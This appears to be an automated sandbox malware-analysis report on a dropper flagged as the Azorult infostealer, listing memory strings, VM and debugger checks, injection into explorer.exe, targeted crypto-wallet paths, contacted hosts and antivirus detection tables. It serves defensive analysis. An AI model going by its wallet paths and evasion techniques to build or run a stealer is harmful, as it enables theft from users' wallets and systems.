#13.RAM slot #13...(!.....................................RAM slot #14.RAM slot #14...(".....................................RAM slot #15.RAM slot #15...(#.....................................RAM slot #16.RAM slot #16...($.................
                      Source: ChameleonExplorer.exe, 00000006.00000003.324097015.000000000317C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: tform.None.None.......................No Enclosure.N/A.None.No Asset Tag...0......W...........-.-.A.............,.........CPU 0.GenuineIntel.Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz...0......W...........-.-.A.............,.........CPU 1.GenuineIntel.Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz...........J19.COM 1...........J23.Parallel...........J11.Keyboard...........J12.PS/2 Mouse..................xPCI Slot J11...................PCI Slot J12...................PCI Slot J13...................PCI Slot J14...................PCI Slot J15...................PCI Slot J16..........VMware SVGA II.ES1371.......[MS_VM_CERT/SHA1/27d66596a61c48dd3dc7216fd715126e33f59ae7].Welcome to the Virtual Machine...........P...@............(......@.@.............................VMware Virtual RAM.00000001.VMW-4096MB.RAM slot #0.RAM slot #0...(......................................RAM slot #1.RAM slot #1...(......................................RAM slot #2.RAM slot #2...(......................................RAM slot #3.RAM slot #3...(......................................RAM slot #4.RAM slot #4...(......................................RAM slot #5.RAM slot #5...(......................................RAM slot #6.RAM slot #6...(......................................RAM slot #7.RAM slot #7...(......................................RAM slot #8.RAM slot #8...(......................................RAM slot #9.RAM slot #9...(......................................RAM slot #10.RAM slot #10...(......................................RAM slot #11.RAM slot #11...(......................................RAM slot #12.RAM slot #12...( .....................................RAM slot #13.RAM slot #13...(!.....................................RAM slot #14.RAM slot #14...(".....................................RAM slot #15.RAM slot #15...(#.....................................RAM slot #16.RAM slot #16...($.................
                      Source: ChameleonExplorer.exe, 00000012.00000003.464562073.0000000004C86000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 35 d8 2i!
                      Source: ChameleonExplorer.exe, 00000012.00000002.517693583.00000000031BF000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: ..........................VMware, Inc..VMW71.00V.18227214.B64.2106252220.06/25/2021..........B5. H....^.7.IS....VMware, Inc..None.VMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7.VMware7,1.................Intel Corporation.440BX Desktop Reference Platform.None.None.......................No Enclosure.N/A.None.No Asset Tag...0......W...........-.-.A.............,.........CPU 0.GenuineIntel.Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz...0......W.........
                      Source: ChameleonExplorer.exe, 00000012.00000003.405435943.0000000003C99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual RAM00000001VMW-4096MBRAM sl
                      Source: ChameleonExplorer.exe, 00000012.00000003.441671519.0000000004C5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual RAM00000001VMW-4096MBRAM slot #0RAM slot #0
                      Source: ChameleonExplorer.exe, 00000006.00000003.323117226.0000000003BD0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 35 d8 20
                      Source: ChameleonExplorer.exe, 00000012.00000003.445908659.0000000003CB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMW71.00V.1b
                      Source: ChameleonExplorer.exe, 00000012.00000003.505729138.0000000004D1C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 35 d8 2
                      Source: ChameleonExplorer.exe, 00000012.00000003.390284345.0000000003C36000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWK
                      Source: ChameleonExplorer.exe, 00000012.00000003.398223420.0000000003C3C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 35 d8
                      Source: ChameleonExplorer.exe, 00000012.00000003.441671519.0000000004C5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7VMware7,1
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpCode function: 2_2_0560AFF0 GetSystemInfo,2_2_0560AFF0
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpCode function: 2_2_0560A504 FindFirstFileW,2_2_0560A504
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeCode function: 16_2_0340A504 FindFirstFileW,16_2_0340A504
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\AppData\Roaming\update.exeCode function: 3_2_007B106A mov eax, dword ptr fs:[00000030h]3_2_007B106A
                      Source: C:\Users\user\AppData\Roaming\update.exeCode function: 3_2_007B2453 mov eax, dword ptr fs:[00000030h]3_2_007B2453
                      Source: C:\Users\user\AppData\Roaming\update.exeCode function: 3_2_007B1233 mov eax, dword ptr fs:[00000030h]3_2_007B1233
                      Source: C:\Users\user\AppData\Roaming\update.exeCode function: 3_2_007B12AF mov eax, dword ptr fs:[00000030h]3_2_007B12AF
                      Source: C:\Users\user\AppData\Roaming\update.exeCode function: 3_2_007B12A2 mov eax, dword ptr fs:[00000030h]3_2_007B12A2
                      Source: C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeCode function: 0_2_00E25B09 IsDebuggerPresent,0_2_00E25B09
                      Source: C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeCode function: 0_2_00E25CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00E25CCC
                      Source: C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeCode function: 0_2_00E1A395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00E1A395

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Injects code into the Windows Explorer (explorer.exe)
                      Source: C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeMemory written: PID: 1952 base: 1C0000 value: B8Jump to behavior
                      Source: C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeMemory written: PID: 1952 base: 2512D8 value: 00Jump to behavior
                      Source: C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeMemory written: PID: 1952 base: 2521E8 value: 00Jump to behavior
                      Source: C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeProcess created: C:\Users\user\AppData\Roaming\cexplorer.exe "C:\Users\user\AppData\Roaming\cexplorer.exe" /VERYSILENT /SUPPRESSMSGBOXES /NORESTART /SP-Jump to behavior
                      Source: C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeProcess created: C:\Users\user\AppData\Roaming\update.exe "C:\Users\user\AppData\Roaming\update.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\update.exeProcess created: C:\Users\user\AppData\Roaming\update.exe C:\Users\user\AppData\Roaming\update.exe" Jump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess created: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder64.exe "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder64.exe" 66670Jump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeProcess created: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe"
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                      Source: ChameleonFolder.exe, ChameleonFolder.exe, 00000010.00000002.518805679.0000000003411000.00000020.00000001.01000000.00000010.sdmp, ChameleonExplorer.exe, 00000011.00000002.367005994.0000000003A41000.00000020.00000001.01000000.00000012.sdmp, ChameleonFolder.exe, 00000015.00000002.375388997.0000000002941000.00000020.00000001.01000000.00000010.sdmpBinary or memory string: Shell_TrayWnd
                      Source: ChameleonFolder.exe, ChameleonExplorer.exe, 00000011.00000002.367005994.0000000003A41000.00000020.00000001.01000000.00000012.sdmpBinary or memory string: Progman
                      Source: ChameleonFolder.exe, 0000000F.00000000.332118308.0000000000418000.00000020.00000001.01000000.0000000F.sdmpBinary or memory string: GetTaskbarPositionShell_TrayWnd
                      Source: ChameleonFolder.exe, 0000000F.00000000.332118308.0000000000418000.00000020.00000001.01000000.0000000F.sdmp, ChameleonFolder.exe, 00000010.00000002.518805679.0000000003411000.00000020.00000001.01000000.00000010.sdmp, ChameleonFolder.exe, 00000015.00000002.375388997.0000000002941000.00000020.00000001.01000000.00000010.sdmpBinary or memory string: ProgmanU
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpCode function: 2_2_05605618 cpuid 2_2_05605618
                      Source: C:\Users\user\AppData\Roaming\update.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeCode function: 0_2_00E250D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00E250D7
                      Source: ChameleonExplorer.exe, 00000012.00000002.517530038.0000000003115000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 00000012.00000002.522386790.0000000003BC0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\192.168.2.1\all\procexp.exe
                      Source: ChameleonExplorer.exe, 00000012.00000002.522386790.0000000003BC0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "c:\users\user\desktop\procexp.exe

                      Stealing of Sensitive Information

                      barindex
                      Yara detected Azorult Info Stealer
                      Source: Yara matchFile source: 20.2.update.exe.29b6000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.update.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.update.exe.29b6000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000002.361422399.0000000003176000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.410625256.00000000029B6000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.410254006.0000000000401000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: update.exe PID: 688, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: update.exe PID: 4760, type: MEMORYSTR
                      Yara detected Generic Dropper
                      Source: Yara matchFile source: Process Memory Space: update.exe PID: 688, type: MEMORYSTR
                      Yara detected Azorult
                      Source: Yara matchFile source: 20.2.update.exe.29b6000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.update.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.update.exe.29b6000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000002.361422399.0000000003176000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.410625256.00000000029B6000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.410254006.0000000000401000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: update.exe PID: 688, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: update.exe PID: 4760, type: MEMORYSTR
                      Found many strings related to Crypto-Wallets (likely being stolen)
                      Source: update.exe, 00000003.00000002.361422399.0000000003176000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: electrum.dat
                      Source: update.exe, 00000003.00000002.361422399.0000000003176000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: *6%appdata%\Electrum\wallets\$Coins\Electrum-LTC>%appdata%\Electrum-LTC\wallets\
                      Source: update.exe, 00000003.00000002.361422399.0000000003176000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: *.json,*.seco"%APPDATA%\Exodus\2Coins\Jaxx\Local Storage\:%APPDATA%\Jaxx\Local Storage\ Coins\MultiBitHDpmbhd.wallet.aes,mbhd.checkpoints,mbhd.spvchain,mbhd.yaml*%APPDATA%\MultiBitHD\
                      Source: update.exe, 00000003.00000002.361422399.0000000003176000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: *.json,*.seco"%APPDATA%\Exodus\2Coins\Jaxx\Local Storage\:%APPDATA%\Jaxx\Local Storage\ Coins\MultiBitHDpmbhd.wallet.aes,mbhd.checkpoints,mbhd.spvchain,mbhd.yaml*%APPDATA%\MultiBitHD\
                      Source: update.exe, 00000003.00000002.361422399.0000000003176000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: *.json,*.seco"%APPDATA%\Exodus\2Coins\Jaxx\Local Storage\:%APPDATA%\Jaxx\Local Storage\ Coins\MultiBitHDpmbhd.wallet.aes,mbhd.checkpoints,mbhd.spvchain,mbhd.yaml*%APPDATA%\MultiBitHD\
                      Source: update.exe, 00000003.00000002.361422399.0000000003176000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: UTC*8%APPDATA%\Ethereum\keystore\
                      Source: update.exe, 00000003.00000002.361422399.0000000003176000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: Coins\Exodus
                      Source: update.exe, 00000003.00000002.361422399.0000000003176000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: Coins\Ethereum
                      Source: update.exe, 00000003.00000002.361422399.0000000003176000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: UTC*8%APPDATA%\Ethereum\keystore\
                      Source: update.exe, 00000003.00000002.361422399.0000000003176000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: *6%appdata%\Electrum\wallets\$Coins\Electrum-LTC>%appdata%\Electrum-LTC\wallets\

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid Accounts1
                      Windows Management Instrumentation                      		1
                      DLL Side-Loading                      		1
                      DLL Side-Loading                      		1
                      Deobfuscate/Decode Files or Information                      		31
                      Input Capture                      		1
                      System Time Discovery                      		Remote Services1
                      Archive Collected Data                      		Exfiltration Over Other Network Medium3
                      Ingress Tool Transfer                      		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default Accounts1
                      Native API                      		1
                      Scheduled Task/Job                      		112
                      Process Injection                      		2
                      Obfuscated Files or Information                      		LSASS Memory3
                      File and Directory Discovery                      		Remote Desktop Protocol1
                      Data from Local System                      		Exfiltration Over Bluetooth11
                      Encrypted Channel                      		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain Accounts1
                      Command and Scripting Interpreter                      		111
                      Registry Run Keys / Startup Folder                      		1
                      Scheduled Task/Job                      		12
                      Software Packing                      		Security Account Manager135
                      System Information Discovery                      		SMB/Windows Admin Shares31
                      Input Capture                      		Automated Exfiltration4
                      Non-Application Layer Protocol                      		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local Accounts1
                      Scheduled Task/Job                      		Logon Script (Mac)111
                      Registry Run Keys / Startup Folder                      		1
                      DLL Side-Loading                      		NTDS1
                      Query Registry                      		Distributed Component Object ModelInput CaptureScheduled Transfer15
                      Application Layer Protocol                      		SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script12
                      Masquerading                      		LSA Secrets331
                      Security Software Discovery                      		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.common1
                      Virtualization/Sandbox Evasion                      		Cached Domain Credentials1
                      Virtualization/Sandbox Evasion                      		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup Items112
                      Process Injection                      		DCSync2
                      Process Discovery                      		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
                      Application Window Discovery                      		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow2
                      System Owner/User Discovery                      		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork Sniffing1
                      Remote System Discovery                      		Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                      Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput Capture1
                      System Network Configuration Discovery                      		Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 813135 Sample: B7CFD1D0AAD8B5D5DB5C17DA051... Startdate: 22/02/2023 Architecture: WINDOWS Score: 100 97 Snort IDS alert for network traffic 2->97 99 Malicious sample detected (through community Yara rule) 2->99 101 Antivirus / Scanner detection for submitted sample 2->101 103 7 other signatures 2->103 9 B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe 1 5 2->9         started        14 ChameleonFolder.exe 1 31 2->14         started        16 ChameleonExplorer.exe 2->16         started        18 6 other processes 2->18 process3 dnsIp4 83 iplogger.org 148.251.234.83, 443, 49702 HETZNER-ASDE Germany 9->83 85 2no.co 148.251.234.93, 443, 49701 HETZNER-ASDE Germany 9->85 59 C:\Users\user\AppData\Roaming\update.exe, PE32 9->59 dropped 61 C:\Users\user\AppData\Roaming\cexplorer.exe, PE32 9->61 dropped 63 C:\Users\user\AppData\Local\...\autEDA4.tmp, PE32 9->63 dropped 117 May check the online IP address of the machine 9->117 119 Injects code into the Windows Explorer (explorer.exe) 9->119 20 cexplorer.exe 2 9->20         started        24 update.exe 1 9->24         started        65 C:\...xplorerHelper64.dll_backup, PE32+ 14->65 dropped 67 C:\...xplorerHelper64.dll, PE32+ 14->67 dropped 69 C:\...xplorerHelper32.dll_backup, PE32 14->69 dropped 71 C:\...xplorerHelper32.dll, PE32 14->71 dropped 121 Creates multiple autostart registry keys 14->121 26 ChameleonFolder64.exe 14->26         started        87 www.chameleon-managers.com 16->87 89 ghs.googlehosted.com 16->89 28 ChameleonFolder.exe 16->28         started        file5 signatures6 process7 file8 49 C:\Users\user\AppData\Local\...\cexplorer.tmp, PE32 20->49 dropped 105 Obfuscated command line found 20->105 30 cexplorer.tmp 33 26 20->30         started        107 Antivirus detection for dropped file 24->107 109 Multi AV Scanner detection for dropped file 24->109 111 Detected unpacking (changes PE section rights) 24->111 113 2 other signatures 24->113 33 update.exe 24->33         started        signatures9 process10 dnsIp11 73 C:\...\unins000.exe (copy), PE32 30->73 dropped 75 C:\Program Files (x86)\...\is-LI6V8.tmp, PE32+ 30->75 dropped 77 C:\Program Files (x86)\...\is-HQP5N.tmp, PE32+ 30->77 dropped 79 14 other files (13 malicious) 30->79 dropped 36 ChameleonFolder.exe 1 13 30->36         started        39 ChameleonExplorer.exe 53 30->39         started        42 ChameleonExplorer.exe 9 6 30->42         started        45 ChameleonExplorer.exe 30->45         started        81 51.15.219.86, 49708, 49709, 80 OnlineSASFR France 33->81 file12 process13 dnsIp14 51 C:\...\Folder64.dll_backup, PE32+ 36->51 dropped 53 C:\Program Files (x86)\...\Folder64.dll, PE32+ 36->53 dropped 55 C:\Program Files (x86)\...\Folder.dll_backup, PE32 36->55 dropped 57 C:\Program Files (x86)\...\Folder.dll, PE32 36->57 dropped 47 conhost.exe 36->47         started        115 Creates multiple autostart registry keys 39->115 91 www.chameleon-managers.com 42->91 93 ghs.googlehosted.com 142.250.180.147, 49704, 49707, 80 GOOGLEUS United States 42->93 95 neosoft-activator.appspot.com 142.250.184.84, 443, 49705 GOOGLEUS United States 42->95 file15 signatures16 process17

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe71%VirustotalBrowse
                      B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe77%ReversingLabsWin32.Infostealer.PonyStealer
                      B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe100%AviraTR/Dropper.VB.yedon

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\update.exe100%AviraHEUR/AGEN.1225881
                      C:\Users\user\AppData\Roaming\update.exe100%Joe Sandbox ML
                      C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe (copy)0%ReversingLabs
                      C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe (copy)2%ReversingLabs
                      C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder64.exe (copy)0%ReversingLabs
                      C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper32.dll3%ReversingLabs
                      C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper32.dll_backup3%ReversingLabs
                      C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper32.dll_new (copy)3%ReversingLabs
                      C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper64.dll0%ReversingLabs
                      C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper64.dll_backup0%ReversingLabs
                      C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper64.dll_new (copy)0%ReversingLabs
                      C:\Program Files (x86)\Chameleon Explorer\Folder.dll3%ReversingLabs
                      C:\Program Files (x86)\Chameleon Explorer\Folder.dll_backup3%ReversingLabs
                      C:\Program Files (x86)\Chameleon Explorer\Folder.dll_new (copy)3%ReversingLabs
                      C:\Program Files (x86)\Chameleon Explorer\Folder64.dll3%ReversingLabs
                      C:\Program Files (x86)\Chameleon Explorer\Folder64.dll_backup3%ReversingLabs
                      C:\Program Files (x86)\Chameleon Explorer\Folder64.dll_new (copy)3%ReversingLabs
                      C:\Program Files (x86)\Chameleon Explorer\is-4Q1I9.tmp3%ReversingLabs
                      C:\Program Files (x86)\Chameleon Explorer\is-5C20L.tmp3%ReversingLabs
                      C:\Program Files (x86)\Chameleon Explorer\is-7RNBS.tmp0%ReversingLabs
                      C:\Program Files (x86)\Chameleon Explorer\is-89A92.tmp3%ReversingLabs
                      C:\Program Files (x86)\Chameleon Explorer\is-EV8UG.tmp2%ReversingLabs
                      C:\Program Files (x86)\Chameleon Explorer\is-FAU52.tmp3%ReversingLabs
                      C:\Program Files (x86)\Chameleon Explorer\is-HQP5N.tmp0%ReversingLabs
                      C:\Program Files (x86)\Chameleon Explorer\is-LI6V8.tmp0%ReversingLabs
                      C:\Program Files (x86)\Chameleon Explorer\unins000.exe (copy)3%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\autEDA4.tmp2%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmp3%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\is-V4HOF.tmp\_isetup\_setup64.tmp0%ReversingLabs
                      C:\Users\user\AppData\Roaming\cexplorer.exe2%ReversingLabs
                      C:\Users\user\AppData\Roaming\update.exe80%ReversingLabsWin32.Infostealer.Fareit

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      0.0.B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe.df0000.0.unpack100%AviraHEUR/AGEN.1225881Download File
                      20.2.update.exe.400000.0.unpack100%AviraHEUR/AGEN.1232827Download File
                      20.2.update.exe.29b6000.1.unpack100%AviraTR/Patched.Ren.GenDownload File
                      3.2.update.exe.400000.0.unpack100%AviraHEUR/AGEN.1225881Download File
                      0.2.B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe.df0000.0.unpack100%AviraHEUR/AGEN.1225881Download File
                      20.0.update.exe.400000.0.unpack100%AviraHEUR/AGEN.1225881Download File
                      3.0.update.exe.400000.0.unpack100%AviraHEUR/AGEN.1225881Download File

                      Domains

                      SourceDetectionScannerLabelLink
                      2no.co4%VirustotalBrowse
                      ghs.googlehosted.com0%VirustotalBrowse
                      neosoft-activator.appspot.com0%VirustotalBrowse
                      www.chameleon-managers.com0%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      https://dotbit.me/a/0%URL Reputationsafe
                      https://dotbit.me/a/0%URL Reputationsafe
                      http://crl.startssl.com/sfsca.crl0f0%URL Reputationsafe
                      http://www.palkornel.hu/innosetup%10%URL Reputationsafe
                      http://www.innosetup.com/0%URL Reputationsafe
                      http://www.startssl.com/policy00%URL Reputationsafe
                      http://counter-strike.com.ua/0%URL Reputationsafe
                      http://ocsp.thawte.com00%URL Reputationsafe
                      http://ocsp.startssl.com070%URL Reputationsafe
                      http://ocsp.startssl.com000%URL Reputationsafe
                      http://www.dk-soft.org/0%URL Reputationsafe
                      https://wl.gl/tg0%Avira URL Cloudsafe
                      https://counter.yadro.ru/hit?0%Avira URL Cloudsafe
                      http://www.chameleon-managers.comQN(0%Avira URL Cloudsafe
                      http://www.chameleon-managers.com3&0%Avira URL Cloudsafe
                      http://aia.startssl.com/certs/sca.code2.crt060%Avira URL Cloudsafe
                      http://www.chameleon-managers.com3_lmPlmP0%Avira URL Cloudsafe
                      http://www.chameleon-managers.com/subscription/?action=latest&key=0%Avira URL Cloudsafe
                      http://www.chameleon-managers.comsK0%Avira URL Cloudsafe
                      http://www.chameleon-managers.com3j0%Avira URL Cloudsafe
                      http://www.chameleon-managers.com3l0%Avira URL Cloudsafe
                      http://www.chameleon-managers.com3h0%Avira URL Cloudsafe
                      http://www.chameleon-managers.com3c0%Avira URL Cloudsafe
                      http://www.chameleon-managers.com/contacts.php?utm_source=program&utm_medium=question&utm_campaign=0%Avira URL Cloudsafe
                      http://www.chameleon-managers.com3g0%Avira URL Cloudsafe
                      https://wl.gl/app0%Avira URL Cloudsafe
                      http://www.chameleon-managers.com3f0%Avira URL Cloudsafe
                      http://www.chameleon-managers.com30%Avira URL Cloudsafe
                      http://www.chameleon-managers.com3d0%Avira URL Cloudsafe
                      http://www.chameleon-managers.com3e0%Avira URL Cloudsafe
                      http://www.chameleon-managers.comSQ0%Avira URL Cloudsafe
                      http://www.startssl.com/0Q0%Avira URL Cloudsafe
                      http://www.chameleon-managers.com3V$mP$mP0%Avira URL Cloudsafe
                      https://2no.co/0%Avira URL Cloudsafe
                      https://neosoft-activator.appspot.com/0%Avira URL Cloudsafe
                      https://2no.co/1dHC370%Avira URL Cloudsafe
                      http://www.chameleon-managers.comc0%Avira URL Cloudsafe
                      http://www.chameleon-managers.com/subscription/?action=extend&key=0%Avira URL Cloudsafe
                      http://www.chameleon-managers.coms0%Avira URL Cloudsafe
                      http://www.chameleon-managers.com/info/versions/0%Avira URL Cloudsafe
                      http://www.chameleon-managers.comBhttp://www.chameleon-managers.comBhttp://www.chameleon-managers.co0%Avira URL Cloudsafe
                      http://www.chameleon-managers.com/reg.php?program=0%Avira URL Cloudsafe
                      http://www.chameleon-managers.comH0%Avira URL Cloudsafe
